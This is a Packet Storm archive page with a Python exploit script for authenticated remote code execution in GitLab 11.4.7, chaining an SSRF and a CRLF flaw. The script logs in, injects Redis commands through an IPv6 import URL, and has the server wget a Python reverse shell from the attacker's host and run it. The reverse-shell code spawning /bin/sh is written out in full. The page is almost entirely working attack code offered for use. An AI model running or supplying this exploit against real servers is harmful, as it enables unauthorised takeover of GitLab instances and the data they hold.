what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GitLab 11.4.7 Remote Code Execution

GitLab 11.4.7 Remote Code Execution
Posted Dec 16, 2020
Authored by Mohin Paramasivam

GitLab version 11.4.7 authenticated remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2018-19571, CVE-2018-19585
SHA-256 | a366323b7d7d1eea7a69c2b0ccda38033cdfe86c919d53827d40042fd3be1f7d

GitLab 11.4.7 Remote Code Execution

Change Mirror Download
# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
# Date: 15th December 2020
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Software Link: https://about.gitlab.com/
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
# Tested on: GitLab 11.4.7 CE
# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)

import requests
import re
import warnings
from bs4 import BeautifulSoup
import sys
import base64
import urllib
from random_words import RandomWords
import argparse
import os
import time




parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
parser.add_argument('-U',help='GitLab Username')
parser.add_argument('-P',help='Gitlab Password')
parser.add_argument('-l',help='rev shell lhost')
parser.add_argument('-p',help='rev shell lport ',type=int)
args = parser.parse_args()


username = args.U
password = args.P
lhost = args.l
lport = args.p


#Retrieve CSRF Token

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
gitlab_url = "http://10.129.49.62:5080"
request = requests.Session()
print("[+] Retrieving CSRF token to submit the login form")
time.sleep(1)
page = request.get(gitlab_url+"/users/sign_in")
html_content = page.text
soup = BeautifulSoup(html_content,features="lxml")
token = soup.findAll('meta')[16].get("content")


print("[+] CSRF Token : "+token)
time.sleep(1)


#Login

login_info ={
"authenticity_token": token,
"user[login]": username,
"user[password]": password,
"user[remember_me]": "0"
}


login_request = request.post(gitlab_url+"/users/sign_in",login_info)


if login_request.status_code==200:
print("[+] Login Successful")
time.sleep(1)

else:

print("Login Failed")
print(" ")
sys.exit()




#Exploitation

print("[+] Running Exploit")
time.sleep(1)
print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
time.sleep(1)

ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"


r = RandomWords()
project_name = r.random_word()
project_url = '%s/%s/'%(gitlab_url,username)

print("[+] Creating Project")
time.sleep(1)
print("[+] Project Name : "+project_name)
time.sleep(1)

print("[+] Creating Python Reverse Shell")
time.sleep(1)


python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)


os.system("touch shell.py")
shell_file = open("shell.py","w")
shell_file.write(python_shell)
shell_file.close()


print("[+] Reverse Shell Generated")
time.sleep(1)

print("[+] Start HTTP Server in current directory")


print("Command : python3 -m http.server 80")
time.sleep(2)

http_server = raw_input("Continue (Y/N) : ")

if (http_server=="N") or (http_server=="n"):
print("Start HTTP Server before running exploit")

elif (http_server=="Y") or (http_server=="y"):



print("Run this script twice with options below to get SHELL!")
print("")
print("Option 1 : Download shell.py rev shell to server using wget")
print("Option 2 : Execute shell.py downloaded previously")

option = raw_input("Option (1/2) : ")


if option=="1":



reverse_shell= """\nmulti
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
exec
exec
exec\n""" %(lhost)


project_page = request.get(gitlab_url+"/projects/new")
html_content = project_page.text
soup = BeautifulSoup(html_content,features="lxml")
project_token = soup.findAll('meta')[16].get("content")
namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
urlencoded_token1 = project_token.replace("==","%3D%3D")
urlencoded_token_final = urlencoded_token1.replace("+","%2B")


payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)






proxies = {
"http" : "http://127.0.0.1:8080",
"https" : "https://127.0.0.1:8080",
}

cookies = {
'sidebar_collapsed': 'false',
'event_filter': 'all',
'hide_auto_devops_implicitly_enabled_banner_1': 'false',
'_gitlab_session':request.cookies['_gitlab_session'],
}

headers = {
'Host': '10.129.49.31:5080',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://10.129.49.31:5080/projects',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '398',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
}



#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)

response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
print("[+] Success!")
time.sleep(1)
print("[+] Run Exploit with Option 2")


elif option=="2":

reverse_shell= """\nmulti
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
exec
exec
exec\n"""




project_page = request.get(gitlab_url+"/projects/new")
html_content = project_page.text
soup = BeautifulSoup(html_content,features="lxml")
project_token = soup.findAll('meta')[16].get("content")
namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
urlencoded_token1 = project_token.replace("==","%3D%3D")
urlencoded_token_final = urlencoded_token1.replace("+","%2B")


payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)






proxies = {
"http" : "http://127.0.0.1:8080",
"https" : "https://127.0.0.1:8080",
}

cookies = {
'sidebar_collapsed': 'false',
'event_filter': 'all',
'hide_auto_devops_implicitly_enabled_banner_1': 'false',
'_gitlab_session':request.cookies['_gitlab_session'],
}

headers = {
'Host': '10.129.49.31:5080',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://10.129.49.31:5080/projects',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '398',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
}



#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)

response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
print("[+] Success!")
time.sleep(1)
print("[+] Spawning Reverse Shell")

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close